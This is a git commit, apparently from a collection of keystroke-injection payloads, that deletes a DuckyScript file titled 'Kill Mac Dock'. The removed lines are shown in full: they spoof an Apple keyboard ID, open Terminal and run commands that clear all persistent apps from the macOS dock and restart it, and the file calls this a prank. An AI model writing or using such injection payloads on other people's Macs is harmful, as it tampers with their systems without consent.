Removed Kill Mac Dock.txt due topotential sysystem destruction

This commit is contained in:
Narstybits
2023-07-05 09:40:08 -05:00
parent 9dfd42fb9a
commit 4c7526a4bb
-29
View File
@@ -1,29 +0,0 @@
REM This command clears all persistent apps from the dock.
REM Run this script to remove apps from the dock.
REM Use responsibly and with proper permissions.
REM Author: Narsty
REM Title: Kill Mac Dock
REM Target: MacOS
REM Version: 1.0
REM Category: Prank
ID 05ac:021e Apple:Keyboard
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING defaults write com.apple.dock persistent-apps -array
ENTER
DELAY 500
STRING killall Dock
ENTER